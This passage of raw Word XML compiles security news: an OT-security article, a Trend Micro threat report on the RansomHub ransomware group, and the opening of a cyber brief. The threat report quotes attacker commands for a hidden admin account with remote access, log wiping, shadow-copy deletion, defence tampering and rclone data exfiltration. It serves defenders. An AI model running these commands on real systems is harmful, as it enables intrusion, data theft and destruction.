(OT) security Xona Systems' customers, and the consensus is: "There's a lot more that could be done to protect critical infrastructure," COO Bill Cantrell told The Register. "The overriding theme is that there's just not enough funding."</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biggest concern among critical infrastructure owners and operators continues to be physical safety and reliability. "Those things have always been at the forefront in this industry, Cantrell said. "There's a lot of very dangerous, high-power equipment and so it's making sure it's reliable, it's safe, and there are good backup procedures."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These are very real concerns. Critical systems providing drinking water or heat can't fail without potential life-and-death consequences, and shutting down these systems to update or patch security flaws introduces a raft of physical-world risks.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Over the last several years, however, there have been added concerns around network connectivity and remote access as more OT and IoT devices and systems become connected to the internet.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"It's a new vector of pressure that has been put on these OT folks," Cantrell said. "It's a world where the OT guys don't understand the networking and cyber issues, and the IT guys don't really understand all of the constraints around safety and reliability that go along with these OT networks."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most important thing that critical industries should be doing is to modernize secure access to remote infrastructure, according to Cantrell. "That's where most of these breaches come from is through stolen credentials, VPNs, older jump boxes," he said, adding that visibility is another key piece. "Half the time, they don't even know everything that is on the network."</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And it's a lot to deal with for an org using legacy OT gear and trying to get up to speed on IT concepts like zero-trust access while facing down attempted attacks from ransomware crews and nation-states on a daily basis.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scary thing is that some of these threats may be laying in wait and dormant right now," Cantrell said. "They may be doing some intel collection and possibly laying in wait to trigger actions when they feel it's necessary."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 echoed CISA and the FBI's alerts of late about it being incredibly hard to kick intruders off of critical networks when you don't know they are there in the first place. "Some of them may be compromised, and they may not even know it." (R)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Register 2024.12.31 14:57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.theregister.co.uk/2024/12/31/china_cyber_intrusions_2024/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ransomware Spotlight: Ransomhub</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December 20, 2024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X</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RansomHub</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Trend Research</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RansomHub is a young Ransomware-as-a-Service (RaaS) group tracked by Trend Micro as Water Bakunawa. Despite being a young ransomware group first detected in February 2024, RansomHub moves boldly by targeting larger enterprises more likely to pay ransoms.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infographic of "Ransomware Spotlight: RansomHub"</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RansomHub is a young Ransomware-as-a-Service (RaaS) group first detected in February 2024 and tracked by Trend Micro as Water Bakunawa. It quickly gained notoriety for their "big game hunting" tactic. They prey on victims who are more likely to pay large ransoms to mitigate the downtime on business operations caused by a ransomware attack. They target cloud storage backups and misconfigured Amazon S3 instances to threaten backup providers with data leaks, taking advantage of the trust between providers and their clients.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March 2024, RansomHub added Change Healthcare to their list of victims. This company was previously targeted by BlackCat in an attack that made headlines when an affiliate accused the ransomware group otherwise known as ALPHV of pulling an exit scam, and later followed by the group going dark. It's possible that RansomHub is a rebrand of the BlackCat ransomware group or that affiliates wronged in the alleged exit scam moved to RansomHub to collect the ransom money they believe they are owed. There are also reports indicating that BlackCat affiliates are joining the RansomHub group.What organizations need to know about RansomHub ransomware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RansomHub ransomware group (Water Bakunawa) recruits affiliates through the mostly Russian cybercriminal dark web forum RAMP. The ransomware group uses ransomware variants rewritten in GoLang to target Windows and Linux systems and uses C++ to target ESXi servers. The group adhered by strict rules: they do not attack non-profit organizations, and they do not target again victims who have already paid. They also avoid targeting members of the Commonwealth of Independent States (CIS), as well as Cuba, North Korea, and China.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RansomHub has been observed to promise sending a decryptor for free if an affiliate doesn't provide one after payment or if they mistakenly attack an off-limits organization. Affiliates keep 90% of the ransom, with the remaining 10% going to the main group.</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There are also notable similarities between the RansomHub group and the Knight ransomware groups, also referred to as Cyclops ransomware. The management panel of RansomHub's RaaS operation shares design and feature similarities with the Knight RaaS panel. Cyclops is recognized as the operator of the Knight RaaS program and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>offered to sell the source code for Knight 3.0 ransomware on the RAMP cybercrime forum back in February 18, 2024. This offer included the source code for both the management panel and the ransomware, written in C++ and GoLang, languages also used for RansomHub's ransomware.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Interestingly, on February 12, 2024, days before the source code sale, the Knight RaaS Tor-based victim name-and-shame blog became inaccessible and remained so at the time of writing. Meanwhile, the RansomHub RaaS was launched around the same time. These connections suggest that the RansomHub ransomware may be a successor or substitute for the Knight ransomware group.</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Infection chain and techniques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 The RansomHub ransomware observed infection chain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Initial Access The RansomHub ransomware group use spear-phishing voice scams for initial access. The cybercriminals use social engineering to orchestrate victim account password resets, employing speakers with a convincing American accent to lure victims. RansomHub also possibly uses compromised VPN accounts.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Execution Operators behind RansomHub use PsExec to execute commands remotely on the victim's machine. They have also been observed to use Powershell scripts to execute commands related to credential access, discover remote systems, establish SSH connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>They have also been observed to use Python scripts to establish SSH connections, transfer the encryptor via Secure File Transfer Protocol (SFTP), and execute the encryptor simultaneously across multiple servers.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Persistence RansomHub uses a local account to maintain access and adds the created user to administrator groups to maintain elevated access.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Defense Evasion RansomHub drops and executes a batch file named disableAV.bat detected as Trojan.BAT.KAPROCHANDLER.A. It copies and executes the binary used to terminate and delete antivirus-related processes and files. The binary used, detected as STONESTOP, uses a signed driver, detected as POORTRY, to delete files and terminate processes that are related to antivirus products. The ransomware also uses another batch file todelete multiple registry subkeys and entriesintended to bypass virus and threat protection settings in Windows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RansomHub also uses TDSSKiller to disable antivirus or EDR solutions in the target system and TOGGLEDEFENDER to disable Windows Defender.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware group also uses EDR Kill Shifter that functions as a loader executable that utilizes the Bring Your Own Vulnerable Driver (BYOVD) technique. It exploits different vulnerable drivers to disable EDR protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware group also uses IOBit Unlocker tounlock files and foldersthat are locked by other processes or programs.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Credential Access RansomHub uses MIMIKATZ, LaZagne, and SecretServerSecretStealer to retrieve passwords and credentials on their victim's machines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The ransomware group has also been observed to exploit the Veeam Backup &amp; Replication component vulnerability CVE-2023-27532, where they connected to the Veeam.Backup.Service.exeon TCP/9401, created a network share, and then created and executed a Powershell script to dump credentials from the Veeam database to a text file. The group was also seen using Veeamp which is a credential dumping tool specifically designed to extract credentials from a SQL database utilized by Veeam backup management software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A sample from the ransomware group has also been observed to conduct a brute force attack on the domain controller which was followed by a ntlmv1 logon to the domain controller. The group has also been observed extracting the NTDS.dit file which is a database that stores the Active Directory data including users, groups, security descriptors and password hashes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RansomHub also uses a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.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Discovery RansomHub operators use NetScan to discover and retrieve information about network devices. They also use Advanced Port Scanner to scan for open ports on network computers.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Lateral Movement RansomHub ransomware uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and delete anti-virus related processes and files, respectively. The group employs a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configures the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RansomHub operators also use a SMB spreader that uses Impacket, which was provided to RansomHub affiliates. The SMB spreader runs a specified ransomware executable over the affected system's local network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The group also used SFTP to transfer the encryptor.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Command and Control RansomHub operators use Atera, Splashtop, AnyDesk, Ngrok, Screen Connect and Remmina to to gain access on victim machines remotely.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Impact RansomHub ransomware uses two encryption algorithms to encrypt target files: ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. The ransomware binary requires a -pass argument with a 32-byte passphrase to be specified when the ransomware is executed. The 32-byte passphrase is used to decrypt an embedded configuration during runtime which contains the file extensions, file names, and folders to avoid, processes and services to terminate, as well as compromised login accounts.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Exfiltration RansomHub ransomware has been detected using the third-party tool and web- service RClone to exfiltrate to stolen information.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MITRE tactics and techniques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Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCommand and ControlImpactExfiltration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T1078 - Valid Accounts The ransomware group could have possibly used compromised VPN accounts.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T1566.004 - Phishing: Spearphishing Voice Based on external reports, the ransomware group uses social engineering to orchestrate victim account password resets, particularly with American- accented speakers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T1059.001 - Command and Scripting Interpreter: PowerShell o Based on external reports, the ransomware group uses PowerShell scripts to execute commands related to credential access, discover remote systems, and enable SSH service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>o The ransomware group also used a PowerShell script to download AnyDesk: Function AnyDesk { mkdir "C:\ProgramData\AnyDesk" # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "hxxp://download[.]anydesk[.]com/AnyDesk.exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with- win --silent cmd.exe /c echo {redacted} | C:\ProgramData\anydesk.exe --set- password net user {redacted} "{redacted}" /add net localgroup Administrators {redacted} /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v {redacted} /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id }</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T1059.006 - Command and Scripting Interpreter: Python Based on external reports, the ransomware group utilizes a customized Python script to establish an SSH connection with targeted ESXi servers, transfer the encryptor via SFTP, confirm the successful transfer, and execute the encryptor simultaneously across multiple servers.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T1059.003 - Command and Scripting Interpreter: Windows Command Shell The ransomware binary accepts the following parameters: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 versions of the RansomHub accepts the following command line parameters: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can also execute supplied commands before its encryption routine by using the-cmd {command to execute}parameter.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T1136.001 - Create Account: Local Account The ransomware group was able to execute command via the net command-line utility to create a local account, maintaining access to victim systems.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T1098 - Account Manipulation The ransomware group was able to execute command via the net command-line utility to add created user account to the administrator groups to maintain elevated access.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T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder If -safeboot is passed as an argument, the ransomware binary adds the following entries to the SOFTWARE\Microsoft\Windows NT\CurrentVersion\RunOnce registry key to execute itself upon reboot: *zCCyEs = {Malware File Path}\{Malware File Name} -safeboot-instance -pass {32-byte passphrase}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T1547 - Boot or Logon Autostart Execution o The ransomware binary enables automatic logon by adding the following registry entries in the SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>o The credentials are then saved to a text file named user.txt. The login information is also displayed in the console.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AutoAdminLogon = 1 DefaultUserName = Administrator DefaultDomainName = DefaultPassword = {random characters}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T1078.003 - Valid Accounts: Local Accounts If -safeboot is passed as an argument, the ransomware binary attempts to login as the administrator using the compromised usernames and passwords included in the credentials key in the encrypted configuration using the API LogonUserW. If the login attempt fails it enables automatic logon.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T1134.001 - Access Token Manipulation: Token Impersonation/Theft The ransomware binary can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.</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T1480 - Execution Guardrails The ransomware binary requires a -pass argument with a 32 byte passphrase to be specified when the ransomware is executed. If the wrong password is supplied, the RansomHub sample will not properly execute and will instead print bad config to the console.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T1112 - Modify Registry Based on external reports, The ransomware group removes various registry subkeys and entries to bypass virus and threat protection settings in Windows: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies" /f reg delete "HKCU\Software\Microsoft\WindowsSelfHost" /f reg delete "HKCU\Software\Policies" /f reg delete "HKLM\Software\Microsoft\Policies" /for reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Windows Store\Windows Update" /f reg delete "HKLM\Software\Microsoft\WindowsSelfHost" /f reg delete "HKLM\Software\Policies" /f reg delete "HKLM\Software\WOW6432Node\Microsoft\Policies" /for reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Policies" /f reg delete "HKLM\Software\WOW6432Node\Microsoft\Windows\\CurrentVersion\Windows Store\Windows Update" /f</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T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File The ransomware binary used an encrypted configuration which will be decrypted at runtime using the 32-byte passphrase used during command line execution. It also contains configurable settings that exist under the settings key in the encrypted configuration.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T1564.003 - Hide Artifacts: Hidden Window The ransomware binary has used the API ShowWindow to hide the console window.</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T1070.001 - Clear Windows Event Logs Using the API CreateProcessW, the ransomware binary clears windows event logs using the following utility commands: o cmd.exe /c wevtutil cl security o cmd.exe /c wevtutil cl system o cmd.exe /c wevtutil cl application The ransomware group also used a batch file namedLogDel.batto clear Windows event logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>List of cleared logs in the IoCs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T1562.006 - Impair Defenses: Indicator Blocking The ransomware binary uses the API SetErrorMode with 0x8003 as an argument to prevent the system from displaying any error on the screen.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T1222.001 - Windows File and Directory Permissions Modification It executes the following commands to allow remote symbolic links to point to local resources: cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1" LogDel.batwas used tomodifythe attributes of the default.rdp by removing the system and hidden attributes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>attrib Default.rdp -s -h</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T1562.009 - Impair Defenses: Safe Mode Boot If -safeboot is passed as an argument, the ransomware binary can reboot the victim's machine in safe mode with networking by executing the following processes using the API CreateProcessW.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>bcdedit /set {default} safeboot network</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T1003 - OS Credential Dumping After it connects to Veeam.Backup.Service.exeon TCP/9401, it creates a network share using the net command-line utility then it creates a Powershell script on the network share executed to dump credentials from the Veeam database. The dumped credentials are then saved to a text file.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T1003.003 - OS Credential Dumping: NTDS The ransomware group was observed to be extracting the NTDS.dit file.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T1110 - Brute Force The ransomware group conducted brute force attack on the domain controller which was followed by an ntlmv1 logon to the domain controller.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T1110.003 - Brute Force: Password Spraying The ransomware group used a batch file named232.batto perform password spraying.</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T1003.001 - OS Credential Dumping: LSASS Memory The ransomware group performed credential dumping through the LSASS task manager dump.</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T1555.005 - Credentials from Password Stores: Password Managers Based on external reports, the ransomware group used a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.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T1057 - Process Discovery The ransomware binary uses the APIs Process32FirstW and Process32NextW to search for processes that it will terminate listed in its configuration, kill_processes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>See the list of kill_processes here.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T1082 - System Information Discovery The ransomware binary uses the API GetLogicalDriveStringsW to enumerate all mounted drives, and GetDriveTypeW to determine the drive type.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T1083 - File and Directory Discovery The ransomware binary uses the API FindFirstFileW and FindNextFileW to search for files and folders that it will encrypt and to avoid whitelisted files and folders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Click to see the list of white-folders and white_files.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T1082 - System Information Discovery The ransomware binary attempts to determine if it is operating in a WINE environment by using the GetProcAddress API to check for the presence of the wine_get_version function.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T1087.001 - Account Discovery: Local Account The ransomware binary uses the API NetUserEnum to enumerate local accounts.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T1135 - Network Share Discovery The ransomware binary uses the API NetShareEnum to discover and encrypt shared resources on the compromised hosts.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T1570 - Lateral Tool Transfer The ransomware binary uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and delete anti-virus-related processes and files, respectively.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T1021.004 - Remote Services: SSH Based on external reports, the ransomware group employed a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.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T1105 - Ingress Tool Transfer Based on external reports, the ransomware group uses SFTP to transfer the encryptor.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T1486 - Data Encrypted for Impact It avoids encryptingfiles with the following file extensions: o *.deskthemepack o *.themepack o *.theme o *.msstyles o *.exe o *.drv o *.msc o *.dll o *.lock o *.sys o *.msu o *.lnk o *.ps1 o *.iso o *.inf o *.cab o *.386</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avoids encrypting files with the following strings in their file name: o NTUSER.DAT o autorun.inf o boot.ini o desktop.ini o thumbs.db</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 It avoids encrypting files found in the folders in this list of white_folders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>o It appends the first six characters of the master public key as a file extension to the encrypted file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>o It empties the recycle bin of the affected machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">o It drops the following ransom notes: {Encrypted directory}\README_{first six characters of the master public key}.txt o It uses two encryption algorithms to encrypt target files, ECDH and AES. The ransomware then appends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the 32-byte master public key from its configuration to the end of each encrypted file. It has an embedded configuration, decrypted during runtime, which contains the file extensions, file names, and folders to avoid.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T1490 - Inhibit System Recovery The ransomware binary executes the following command to delete shadow copies: powershell.exe -Command Powershell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""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T1489 - Service Stop The ransomware binary executes the following commands to stop all virtual machines running on a Hyper-V host: powershell.exe -Command PowerShell -Command "\"Get-VM | Stop-VM -Force\"" The ransomware binary also stops all the IIS services using the following command: cmd.exe /c iisreset.exe /stop The ransomware binary uses the API ControlService with dwControl set to 1 (SERVICE_CONTROL_STOP) to terminate services included in its configuration, kill_services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>See the list of kill-services here.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T1529 - System Shutdown/Reboot If -safeboot is passed as an argument, the ransomware binary issues the following command to reboot a system: cmd.exe /c shutdown /r /f /t 0</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T1567.002 - Exfiltration to Cloud Storage Using RClone, the group exfiltrated files via the following command: rclone copy \\{redacted}\i$ {redacted}\Users --include ".pdf" --include ".xls" --include ".xlsx" --include ".doc" --include ".msg" --include ".rtf" --include ".mdb" --include ".db" --include ".csv" --include ".docx" -- include ".jpg" --include ".png" --include ".dot" --include ".wbk" --include ".docm" --include ".dotx" --include ".xlt" --include ".xlm" --include ".accdb" --include ".sql" --include ".pst" --include ".jpeg" --include ".xlsm" --include ".xlsb" --include ".xlr" --include ".sqb" --include ".sq" --include ".DCM" --include "*.tif" --max-age 2020-01-01 Summary of malware, tools, and exploits used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Security teams can watch out for the presence of the following malware tools and exploits that are typically used in LockBit attacks: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ExecutionPrivilege EscalationCredential AccessLateral MovementDiscoveryCommand and ControlDefense EvasionExfiltrationImpact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PsExec CVE-2020-1472 MIMIKATZ LaZagne CVE-2023-27532 SecretServerSecretStealer Veeamp SMB Spreader NetScan Advanced Port Scanner Atera Splashtop AnyDesk Ngrok Remmina ConnectWise Screen Connect POORTRY STONESTOP TOGGLEDEFENDER TDSSKiller EDR Kill Shifter IOBit Unlocker RClone RansomHub Ransomware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Top affected countries and industries from Trend Micro threat intelligence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this section, we outline the activity of both the RansomHub ransomware and the Knight ransomware as investigations suggest that the two are related. RansomHub was first reported in February 2024, but the first instance of an attempted attack in Trend Micro-covered systems was in April 2024. The Knight ransomware, on the other hand, has been active since January this year, when we begin tracking in our telemetry.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2. A monthly breakdown of attempted attacks from Knight ransomware (left) and RansomHub ransomware (right) from January to September 2024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Knight ransomware's top targeted countries include Brazil, the United States, Turkiye, Ireland, and Israel, while RansomHub focused their efforts in targeting enterprises from the United States and Malaysia.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3. A breakdown of the top countries targeted by the Knight (left) and RansomHub (right) ransomware groups from January to September 2024)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many customers chose not to specify the industry in which they belong, data from those that did reveal that Knight ransomware targeted financial institutions the most, while RansomHub ransomware targeted the education sector the most.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4. A breakdown of the top industries targeted by the Knight (left) and RansomHub (right) ransomware groups from January to September 2024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.12.20 09:07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cyber Brief 24-12 - November 2024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Cyber Brief (November 2024)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December 3, 2024 - Version: 1.0</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TLP:CLEAR Executive summary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 analysed 232 open source reports for this Cyber Brief1.</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Relating to cyber policy and law enforcement, Germany announced plans to legislate responsible vulnerability disclosure, while global operations dismantled cybercriminal infrastructures. Interpol's Serengeti operation led to 1.006 arrests in Africa, and China took measures to expand data oversight.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 the cyberespionage front, in Europe, the Russia-linked threat actor APT28 compromised Ukrainian Wi-Fi networks near their targets for covert access. China-linked threat actors leveraged exploits and targeted telecommunications globally.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Relating to cybercrime, in Europe, the most active ransomware operations were Ransomhub, KillSecurity, and Play while the most targeted sectors were technology, manufacturing, and healthcare.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Relating to disruption, DDoS attacks spurred financial institutions to issue preparedness advisories. These incidents underscore heightened security risks amid geopolitical tensions.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 regards data exposure and leaks incidents, several significant breaches exposed sensitive data, with pro-Russia actors targeting German institutions and healthcare sectors. Financial and telecom firms like Finastra also reported significant incidents.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this Cyber Brief we have included several significant vulnerabilities and associated advisories reported in November 2024. Europe Cyber policy and law enforcement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Germany to legislate responsible disclosure of vulnerabilities On November 4, the German Ministry of Justice declared that they are drafting a legal framework for responsible disclosure of vulnerabilities. The idea is that those who report IT security flaws should get recognition rather than a sanction. Cyberespionage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APT28 exploited Ukrainian Wi-Fi networks near their targets On November 22, Volexity revealed that Russia-linked threat actor APT28 used a novel "Nearest Neighbour Attack" against Ukraine in February 2022 to exploit nearby Wi-Fi networks for covert access. By targeting dual-homed systems and leveraging compromised credentials, they bypassed MFA-secured systems to infiltrate Ukraine-related projects, demonstrating the unprecedented risks posed by proximity-based Wi-Fi exploitation. russia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New Windows zero-day vulnerability exploited in attacks against Ukrainian entities On November 13, ClearSky Cyber Security uncovered CVE-2024-43451, a zero- day vulnerability affecting Windows systems, actively exploited against Ukrainian entities via phishing e-mails containing malicious URL files 